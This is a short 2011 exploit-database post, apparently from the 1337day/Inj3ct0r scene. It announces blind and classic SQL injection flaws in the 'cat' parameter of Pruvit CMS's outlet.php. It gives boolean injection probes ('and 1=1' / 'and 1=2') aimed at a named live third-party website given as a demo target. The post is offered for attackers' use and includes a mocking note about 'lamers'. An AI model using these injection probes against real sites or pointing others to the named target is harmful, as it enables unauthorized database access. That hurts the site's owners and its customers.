Home / exploits Pruvit CMS SQL Injection
Posted on 01 September 2011
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 #0 _ __ __ __ 1 #1 /' __ /'__` / \__ /'__` 0 #0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 #1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 #0 / / / / \__/ \_ \_ / 1 #1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 #0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 #1 \____/ >> Exploit database separated by exploit 0 #0 /___/ type (local, remote, DoS, etc.) 1 #1 1 #0 [+] Site : 1337day.com 0 #1 [+] Support e-mail : submit[at]1337day.com 1 #0 0 #1 ######################################## 1 #0 I'm OuTLaWz member from Inj3ct0r Team 1 #1 ######################################## 0 #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # spl0itz title: Pruvit CMS (outlet.php) (Blind/SQL Injection) Multiple Vulnerabilities # date: 31/08/2011 # author: OuTLaWz aka The_Exploited # vendor: http://www.pruvit.it/ # version: all # category:: webapps # google dork: no dork bro, is for the lamer ;) # tested on: windows seven 32bit # demo site: http://www.fiver-jeans.it/ # vuln url: http://www.fiver-jeans.it/outlet.php?cat=1 # blind sqli: http://www.fiver-jeans.it/outlet.php?cat=1 and 1=1 //\ http://www.fiver-jeans.it/outlet.php?cat=1 and 1=2 # sqli: http://www.fiver-jeans.it/outlet.php?cat=[SQLi] // 2Pac R.I.P.
